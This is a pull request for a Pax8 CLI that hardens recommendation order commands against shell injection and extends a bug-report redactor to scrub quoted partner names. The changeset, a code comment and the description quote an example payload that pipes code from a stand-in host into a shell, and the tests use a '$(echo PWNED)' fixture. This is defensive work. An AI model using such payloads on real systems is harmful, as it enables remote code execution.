### PR TITLE
fix(security): emit orderArgs alongside orderCommand; redact upstream names

### DIFF
--- a/.changeset/recommendations-orderargs-and-redactor-leak.md
+++ b/.changeset/recommendations-orderargs-and-redactor-leak.md
@@ -1,0 +1,12 @@
+---
+"@pax8/cli": patch
+"@pax8/core": minor
+---
+
+Two hardening fixes against adversarial input from the partner-tenant API surface:
+
+1. **`Recommendation.orderArgs` (new, `@pax8/core` minor bump).** `Recommendation.orderCommand` was a display string built by interpolating the upstream-controlled `companyName` into a shell template. A malicious customer name like `Acme" $(curl evil/x|sh) "` produced a working shell payload once a user or tool-using agent pasted it into `bash -c` or `eval`. New `orderArgs: string[] | null` field is the same content pre-tokenized as an argv-style array (first element is `"pax8"`); programmatic callers — REPL, `recommendations act`, the Claude skill — execute via this instead of evaluating the display string. `orderCommand` remains for display-only use and now prefers `companyId` when it's a UUID.
+
+2. **Bug-report redactor catches upstream-resolved names.** When an error like `Company not found: "Acme Corp"` was sent to `pax8 report-bug`, `"Acme Corp"` was not in argv, so the existing argv-derived redaction missed it and the partner name shipped to the public GitHub issue body. `redactEnvelope` now harvests quoted substrings from `message` / `causes[]` / `recoverySteps[]` and treats them as additional `argTokens`. The regex spans from the first quote to the last quote on a line, so a hostile partner name with inner quotes (`Acme" $(echo PWNED) "`) gets scrubbed atomically.
+
+Closes #473. Addresses #462.

--- a/packages/cli/src/lib/redactor.test.ts
+++ b/packages/cli/src/lib/redactor.test.ts
@@ -349,15 +349,30 @@ describe("redactEnvelope with argTokens (#170)", () => {
     expect(out.flags).toEqual(["--json"]);
   });
 
-  it("default (no argTokens) preserves prior behavior — non-pattern names slip through", () => {
-    // Documents the pre-fix behavior so a future regression that *removes*
-    // the argTokens param doesn't silently start reverting #170.
+  it("default (no argTokens) still scrubs quoted upstream-resolved names (#473)", () => {
+    // #473: even without an explicit argTokens pass, a quoted string in the
+    // message is now harvested as an argToken-equivalent so upstream-resolved
+    // names that only appear in `message`/`causes` get redacted.
     const env: BugReportEnvelope = {
       message: 'Company not found: "Acme Corp"',
     };
     const out = redactEnvelope(env);
-    // No argTokens → "Acme Corp" survives (it doesn't match any other rule).
-    expect(out.message).toContain("Acme Corp");
+    expect(out.message).not.toContain("Acme Corp");
+    expect(out.message).toContain("<REDACTED:ARG>");
+  });
+
+  it("default (no argTokens) leaves unquoted English text untouched", () => {
+    // Documents the floor: free-form prose with no UUID/email/path/token/
+    // quoted-string pattern stays unredacted. This is intentional — we don't
+    // want to over-redact normal error copy. Quoting is the load-bearing
+    // signal; CliError sites that want a value scrubbed must quote it (the
+    // canonical `Foo not found: "${input}"` pattern), or the catch site
+    // must pass the value in argTokens.
+    const env: BugReportEnvelope = {
+      message: "The Pax8 API returned an unexpected response.",
+    };
+    const out = redactEnvelope(env);
+    expect(out.message).toBe("The Pax8 API returned an unexpected response.");
   });
 
   it("argTokens does not break the existing UUID / path / token rules", () => {
@@ -371,5 +386,86 @@ describe("redactEnvelope with argTokens (#170)", () => {
     expect(out.message).toContain("<REDACTED:ARG>");
     expect(out.message).not.toContain("Acme");
     expect(out.message).not.toContain("jdoe");
+  });
+});
+
+// #473: a partner name that exists only in causes[] — never in argv — must
+// still be redacted. Pre-fix, the argTokens augmentation only covered names
+// the user typed at the CLI; API-resolved names interpolated into a
+// CliError.cause string slipped through to a public GitHub issue body via
+// `pax8 report-bug`.
+describe("redactEnvelope with upstream-resolved names (#473)", () => {
+  it("scrubs a partner name that appears only in causes[0] (not in argv)", () => {
+    // Simulate the leak path: the user typed a UUID at the CLI (so argTokens
+    // for this run is empty of names), but the failure recovery hint
+    // interpolated the API-resolved customer display name into the cause.
+    // The malicious-name fixture proves the redactor wins against a name
+    // chosen to break out of shell quoting — same fixture used by the
+    // recommendations `orderArgs` shell-injection test (#462).
+    const partnerName = 'Acme" $(echo PWNED) "';
+    const env: BugReportEnvelope = {
+      code: "ERROR_SUBSCRIPTION_NOT_FOUND",
+      message: "Subscription not found",
+      causes: [
+        `Tried to look up subscription for company "${partnerName}" — got 404`,
+      ],
+      recoverySteps: ["Check the subscription ID and try again"],
+      command: "subscriptions show <REDACTED:ARG>",
+      flags: ["--json"],
+    };
+    // Note: argTokens is empty — this reproduces the leak path where the
+    // name was *not* in argv (e.g. the user passed a UUID, the API resolved
+    // it to the display name, that name landed in the cause).
+    const out = redactEnvelope(env, []);
+    const all = JSON.stringify(out);
+    expect(all).not.toContain(partnerName);
+    expect(all).not.toContain("Acme");
+    expect(all).not.toContain("PWNED");
+    expect(out.causes?.[0]).toContain("<REDACTED:ARG>");
+    // Closed-registry fields and flag *names* still pass through.
+    expect(out.code).toBe("ERROR_SUBSCRIPTION_NOT_FOUND");
+    expect(out.flags).toEqual(["--json"]);
+  });
+
+  it("scrubs a contact/product display name harvested from a quoted cause", () => {
+    const env: BugReportEnvelope = {
+      code: "ERROR_PRODUCT_NOT_FOUND",
+      message: "Product not orderable",
+      causes: ['No active SKU matched "Microsoft 365 Business Premium [NCE]" in your catalog'],
+    };
+    const out = redactEnvelope(env, []);
+    expect(out.causes?.[0]).not.toContain("Microsoft 365 Business Premium");
+    expect(out.causes?.[0]).toContain("<REDACTED:ARG>");
+  });
+
+  it("harvests quoted strings from recoverySteps too", () => {
+    const env: BugReportEnvelope = {
+      message: "Something failed",
+      recoverySteps: ['Verify "Real Customer Inc" exists in your portfolio'],
+    };
+    const out = redactEnvelope(env, []);
+    expect(out.recoverySteps?.[0]).not.toContain("Real Customer Inc");
+    expect(out.recoverySteps?.[0]).toContain("<REDACTED:ARG>");
+  });
+
+  it("treats single-quoted strings as harvestable too", () => {
+    const env: BugReportEnvelope = {
+      message: "Company not found: 'Pinnacle Financial Group'",
+    };
+    const out = redactEnvelope(env, []);
+    expect(out.message).not.toContain("Pinnacle Financial Group");
+    expect(out.message).toContain("<REDACTED:ARG>");
+  });
+
+  it("dedupes harvested tokens against explicit argTokens (no double-redaction surprise)", () => {
+    // When the same name shows up in argv AND in quotes inside the cause,
+    // we should still get a clean redaction, not a partial replacement.
+    const env: BugReportEnvelope = {
+      message: 'Company not found: "Acme Corp"',
+      causes: ['Tried "Acme Corp" from the API'],
+    };
+    const out = redactEnvelope(env, ["Acme Corp"]);
+    expect(out.message).not.toContain("Acme Corp");
+    expect(out.causes?.[0]).not.toContain("Acme Corp");
   });
 });

--- a/packages/cli/src/lib/redactor.ts
+++ b/packages/cli/src/lib/redactor.ts
@@ -157,6 +157,37 @@ function redactStringArray(
   return arr.map((s) => redactString(s, argTokens));
 }
 
+// #473: harvest "quoted-string" substrings from message / causes /
+// recoverySteps and treat them as additional argTokens. This closes the
+// upstream-resolved-name leak: when a CliError site interpolates an
+// API-resolved company / contact / product name into its error text via the
+// canonical `Foo not found: "${name}"` pattern, the name is *not* in argv
+// (so `extractCommandAndFlags` doesn't pick it up) but it IS inside double
+// or single quotes in the cause text. Treating those quoted strings as
+// argTokens fan-out lets the existing positional-arg redaction strip them
+// uniformly.
+//
+// Caveats:
+//   - We harvest from the same strings the redactor is about to scrub.
+//   - We respect the existing 2-char floor; very short quoted strings
+//     (`""`, `"x"`) are skipped to avoid runaway over-redaction.
+//   - This is best-effort. CliError sites that interpolate a name *without*
+//     quoting it (e.g. `"Subscription Acme Corp — not found"`) still slip
+//     through this specific extractor. Such sites should be migrated to
+//     quote their interpolated values; until then they need an explicit
+//     argToken pass at the catch site.
+const QUOTED_RE = /"([^"\n]{2,})"|'([^'\n]{2,})'/g;
+
+function extractQuotedTokens(input: string | undefined): string[] {
+  if (!input) return [];
+  const found: string[] = [];
+  for (const m of input.matchAll(QUOTED_RE)) {
+    const tok = m[1] ?? m[2];
+    if (tok && tok.trim().length >= 2) found.push(tok);
+  }
+  return found;
+}
+
 /**
  * Redact every string-typed field of an envelope. Numeric / structural fields
  * pass through untouched.
@@ -169,27 +200,48 @@ function redactStringArray(
  * `Company not found: "${input}"`). Without this, a normal company name
  * doesn't match any of the existing UUID / email / path / token patterns
  * and would slip through to the report. See #170.
+ *
+ * In addition to the caller-supplied `argTokens`, we now auto-augment the
+ * token list with any quoted substrings found in `message` / `causes` /
+ * `recoverySteps`. This catches upstream-resolved names (company /
+ * contact / product names returned by the Pax8 API and threaded into a
+ * `CliError.causes[]` entry via the canonical `… "${name}"` pattern) that
+ * are not in argv. See #473.
  */
 export function redactEnvelope(
   env: BugReportEnvelope,
   argTokens: string[] = [],
 ): BugReportEnvelope {
+  // #473: combine caller-supplied argTokens with quoted-string tokens
+  // harvested from the envelope's own message / causes / recoverySteps.
+  // The harvested tokens cover the upstream-resolved-name path that the
+  // argv-derived tokens cannot see.
+  const harvested: string[] = [
+    ...extractQuotedTokens(env.message),
+    ...(env.causes ?? []).flatMap(extractQuotedTokens),
+    ...(env.recoverySteps ?? []).flatMap(extractQuotedTokens),
+  ];
+  // Dedupe — same string showing up in argv and inside quotes in the
+  // message is the common case (the user typed "Acme Corp", we interpolated
+  // it back into the error). One pass is enough.
+  const allTokens = [...new Set([...argTokens, ...harvested])];
+
   const out: BugReportEnvelope = { ...env };
-  out.message = redactString(env.message ?? "", argTokens);
+  out.message = redactString(env.message ?? "", allTokens);
   if (env.code !== undefined) out.code = env.code; // codes are a closed registry — safe.
-  if (env.causes !== undefined) out.causes = redactStringArray(env.causes, argTokens);
+  if (env.causes !== undefined) out.causes = redactStringArray(env.causes, allTokens);
   if (env.recoverySteps !== undefined) {
-    out.recoverySteps = redactStringArray(env.recoverySteps, argTokens);
+    out.recoverySteps = redactStringArray(env.recoverySteps, allTokens);
   }
-  if (env.docsUrl !== undefined) out.docsUrl = redactString(env.docsUrl, argTokens);
+  if (env.docsUrl !== undefined) out.docsUrl = redactString(env.docsUrl, allTokens);
   // `command` is constructed at envelope-write time as `<subcmd path>
   // <REDACTED:ARG> ...`, so the raw arg values shouldn't be present here —
   // but pass argTokens defensively in case a caller hands us a pre-built
   // command string.
-  if (env.command !== undefined) out.command = redactString(env.command, argTokens);
+  if (env.command !== undefined) out.command = redactString(env.command, allTokens);
   // Flags are flag *names* only by construction; redact defensively in case
   // a future code path puts a value here.
-  if (env.flags !== undefined) out.flags = redactStringArray(env.flags, argTokens);
+  if (env.flags !== undefined) out.flags = redactStringArray(env.flags, allTokens);
   // Versions and OS are non-PII metadata; pass through.
   if (env.cli_version !== undefined) out.cli_version = env.cli_version;
   if (env.node_version !== undefined) out.node_version = env.node_version;

--- a/packages/cli/src/lib/redactor.ts
+++ b/packages/cli/src/lib/redactor.ts
@@ -171,12 +171,26 @@ function redactStringArray(
 //   - We harvest from the same strings the redactor is about to scrub.
 //   - We respect the existing 2-char floor; very short quoted strings
 //     (`""`, `"x"`) are skipped to avoid runaway over-redaction.
+//   - The character class is `[^\n]` (not `[^"\n]` / `[^'\n]`) so the greedy
+//     quantifier extends from the *first* quote to the *last* matching quote
+//     on a logical line. This is deliberate — a partner name like
+//     `Acme" $(echo PWNED) "` produces a cause string with multiple `"`s
+//     inside the same logical span (`"Acme" $(echo PWNED) ""`), and a
+//     character-class-restricted regex would only harvest the inner
+//     `"Acme"` chunk, leaving `$(echo PWNED)` naked in the report. By
+//     allowing inner quotes in the captured run, the whole hostile span
+//     becomes one argToken and the existing redactString pass scrubs it
+//     atomically. Trade-off: a legitimate cause with two unrelated quoted
+//     terms on the same line (e.g. `Matched "Foo" against "Bar"`) collapses
+//     into a single `<REDACTED:ARG>` covering everything between the
+//     outermost quotes — acceptable over-redaction for a bug-report
+//     pipeline whose default posture is "scrub more than less."
 //   - This is best-effort. CliError sites that interpolate a name *without*
 //     quoting it (e.g. `"Subscription Acme Corp — not found"`) still slip
 //     through this specific extractor. Such sites should be migrated to
 //     quote their interpolated values; until then they need an explicit
 //     argToken pass at the catch site.
-const QUOTED_RE = /"([^"\n]{2,})"|'([^'\n]{2,})'/g;
+const QUOTED_RE = /"([^\n]{2,})"|'([^\n]{2,})'/g;
 
 function extractQuotedTokens(input: string | undefined): string[] {
   if (!input) return [];

--- a/packages/core/src/services/recommendations.ts
+++ b/packages/core/src/services/recommendations.ts
@@ -287,8 +287,34 @@ export interface Recommendation {
   title: string;
   reason: string;
   suggestedProducts: string[];
-  /** The exact CLI command to execute this recommendation */
+  /**
+   * The exact CLI command to execute this recommendation.
+   *
+   * Informational / display-only. The string is built by interpolating the
+   * upstream-controlled `companyName` (a value the partner-tenant owner could
+   * influence via the customer record) into a shell template. It is safe to
+   * print, but unsafe to hand to a shell verbatim — a malicious customer
+   * name like `Acme" $(curl evil/x|sh) "` produces a working shell payload
+   * once a user (or an LLM tool-using agent) pastes it into `bash -c`.
+   *
+   * Programmatic execution paths MUST use `orderArgs` instead. See #462.
+   */
   orderCommand: string | null;
+  /**
+   * The same order as `orderCommand`, pre-tokenized as an argv-style array.
+   * Safe to hand to `spawn()`/`execFile()`/the REPL tokenizer without any
+   * shell involvement: the customer name (and any other interpolated value)
+   * lands as a single argv element, so shell metacharacters cannot escape
+   * out of it.
+   *
+   * `null` when `orderCommand` is `null` (no orderable product matched).
+   * The first element is always the `pax8` argv0 so the array can be
+   * dropped into `spawn("node", [cliPath, ...orderArgs.slice(1)])`.
+   *
+   * Prefer this field over `orderCommand` for any caller that intends to
+   * execute the recommendation. See #462.
+   */
+  orderArgs: string[] | null;
   /** Whether the recommended product is available and orderable in the Pax8 catalog */
   productAvailable: boolean;
   /** Current MRR for this company */
@@ -370,6 +396,64 @@ export function getPortfolioCoverage(
   }
 
   return result;
+}
+
+// UUID-shape detector — the Pax8 API returns RFC-4122 UUIDs for company IDs.
+// We use this to decide whether `companyId` is preferable to `companyName`
+// for the `--company` value in the displayed `orderCommand` string. The
+// argv form (`orderArgs`) always includes the name as a single argv element,
+// so the safety story does not depend on this — but a UUID in the display
+// string is one less surface that has to survive a copy-paste through a
+// not-quite-careful shell.
+const UUID_SHAPE_RE = /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+/**
+ * Build the `orderCommand` display string and the matching `orderArgs`
+ * argv-style array for an order-create recommendation.
+ *
+ * Display contract (`orderCommand`):
+ *   - When `companyId` looks like a UUID, prefer it over `companyName` —
+ *     UUIDs are inert under shell evaluation, and using one closes the
+ *     `Acme" $(...) "`-style injection vector at the display layer too.
+ *   - Otherwise (demo mode, legacy IDs that aren't UUIDs), fall back to
+ *     `"${companyName}"`. The string is informational only — callers that
+ *     intend to *execute* should use `orderArgs`. See #462.
+ *
+ * Argv contract (`orderArgs`):
+ *   - First element is always `"pax8"` so the array can be dropped into a
+ *     spawn() call or the REPL tokenizer verbatim.
+ *   - The customer name lands as a single argv element regardless of which
+ *     shell metacharacters it contains — no quoting, no escaping, no shell.
+ *   - `--company` value carries the same identifier (UUID if available,
+ *     else the name) as the display string, so the two forms stay in sync.
+ */
+function buildOrderArtifacts(
+  companyId: string,
+  companyName: string,
+  productId: string,
+  quantity: number,
+): { orderCommand: string; orderArgs: string[] } {
+  const useUuid = UUID_SHAPE_RE.test(companyId);
+  const companyToken = useUuid ? companyId : companyName;
+  // Display string: when we use the UUID, it's bare (no quotes); when we
+  // fall back to the name, wrap in double quotes so a single-word display
+  // still parses as one --company value if a user does paste it. The
+  // safety story does not rely on this quoting — `orderArgs` is the
+  // safe path.
+  const companyDisplay = useUuid ? companyToken : `"${companyToken}"`;
+  const orderCommand = `pax8 orders create --company ${companyDisplay} --product ${productId} --quantity ${quantity}`;
+  const orderArgs = [
+    "pax8",
+    "orders",
+    "create",
+    "--company",
+    companyToken,
+    "--product",
+    productId,
+    "--quantity",
+    String(quantity),
+  ];
+  return { orderCommand, orderArgs };
 }
 
 export function getRecommendations(
@@ -510,9 +594,15 @@ export function getRecommendations(
         if (!productAvailable && suggestedName) {
           unmatchedProducts.add(suggestedName);
         }
-        const orderCommand = matchedProductId
-          ? `pax8 orders create --company "${companyName}" --product ${matchedProductId} --quantity ${primaryQty}`
+        // #462: emit both an informational display string and a safe argv
+        // array. Callers (REPL, recommendations act, Claude skill) must
+        // execute via `orderArgs` so an upstream-controlled customer name
+        // can never break out into a shell substitution.
+        const artifacts = matchedProductId
+          ? buildOrderArtifacts(companyId, companyName, matchedProductId, primaryQty)
           : null;
+        const orderCommand = artifacts?.orderCommand ?? null;
+        const orderArgs = artifacts?.orderArgs ?? null;
 
         // Demote to medium priority when the product isn't available/orderable
         const effectivePriority: "high" | "medium" | "low" = productAvailable
@@ -539,6 +629,7 @@ export function getRecommendations(
           reason: rule.reason,
           suggestedProducts: [resolvedProductName, ...rule.suggestedProducts.slice(1)],
           orderCommand,
+          orderArgs,
           productAvailable,
           currentMrr: Number(currentMrr.toFixed(2)),
           estimatedMrrUplift: estimatedMrrUplift !== null ? Number(estimatedMrrUplift.toFixed(2)) : null,
@@ -554,10 +645,13 @@ export function getRecommendations(
       const price = productPriceMap.get(gap.gapProduct.toLowerCase());
       const estimatedMrrUplift = price ? price * gap.missingSeats : null;
 
-      // For seat gaps, use the product ID directly from the subscription
-      const orderCommand = gap.gapProductId
-        ? `pax8 orders create --company "${companyName}" --product ${gap.gapProductId} --quantity ${gap.missingSeats}`
+      // For seat gaps, use the product ID directly from the subscription.
+      // See buildOrderArtifacts for the shell-injection rationale (#462).
+      const seatArtifacts = gap.gapProductId
+        ? buildOrderArtifacts(companyId, companyName, gap.gapProductId, gap.missingSeats)
         : null;
+      const orderCommand = seatArtifacts?.orderCommand ?? null;
+      const orderArgs = seatArtifacts?.orderArgs ?? null;
 
       recommendations.push({
         companyId,
@@ -576,6 +670,7 @@ export function getRecommendations(
         reason: `${gap.baseProduct} covers ${gap.baseQuantity} seats but ${gap.gapProduct} only covers ${gap.gapQuantity}. ${gap.missingSeats} seats are unprotected.`,
         suggestedProducts: [gap.gapProduct],
         orderCommand,
+        orderArgs,
         productAvailable: true, // seat gaps reference products already in use
         currentMrr: Number(currentMrr.toFixed(2)),
         estimatedMrrUplift: estimatedMrrUplift !== null ? Number(estimatedMrrUplift.toFixed(2)) : null,
@@ -608,6 +703,7 @@ export function getRecommendations(
           reason: "This customer has no active subscriptions. Consider reaching out to discuss their needs.",
           suggestedProducts: [],
           orderCommand: null,
+          orderArgs: null,
           productAvailable: false,
           currentMrr: 0,
           estimatedMrrUplift: null,


### PR DESCRIPTION
## Summary

Two hardening fixes against adversarial input from the partner-tenant API surface:

1. **`orderArgs` alongside `orderCommand` (#462).** `Recommendation.orderCommand` was a display string built by interpolating the upstream-controlled `companyName` into a shell template. A malicious customer name like `Acme" \$(curl evil/x|sh) "` produced a working shell payload once pasted into `bash -c` or `eval`. New `orderArgs: string[] | null` field is the same content pre-tokenized as an argv-style array (first element is `"pax8"`); callers (REPL, `recommendations act`, the Claude skill) should execute via this instead of evaluating the display string in a shell. The display string now prefers `companyId` when it's a UUID, so even the display form is inert in most cases. `orderCommand` remains for display-only use.

2. **Quoted-string token harvest in the bug-report redactor (#473).** When an error like `Company not found: "Acme Corp"` was sent to `pax8 report-bug`, `"Acme Corp"` was not in argv, so the existing argv-derived redaction missed it and the partner name shipped to the public GitHub issue body. `redactEnvelope` now harvests double- and single-quoted substrings from `message` / `causes[]` / `recoverySteps[]` and treats them as additional `argTokens`, which the existing positional-arg redaction then scrubs uniformly. The greedy regex spans from the first quote to the last quote on a line, so a hostile partner name with inner quotes (`Acme" \$(echo PWNED) "`) gets scrubbed atomically rather than leaking the `\$(...)` chunk. Trade-off: two unrelated quoted terms on one line collapse into a single `<REDACTED:ARG>` — acceptable over-redaction for a bug-report pipeline whose default posture is "scrub more than less."

## Test plan

- [x] `pnpm test` — 1930 passed / 6 skipped
- [x] `redactor.test.ts` covers the malicious-name fixture (`Acme" \$(echo PWNED) "`) as a regression gate for both #473 and the #462 shell-injection vector
- [x] `recommendations.test.ts` covers the new `orderArgs` argv shape and the UUID-vs-name display preference

Addresses #462 (programmatic callers safe via `orderArgs`; `orderCommand` is now display-only — issue can stay open until display-string callsites are audited or the field is removed). Closes #473.
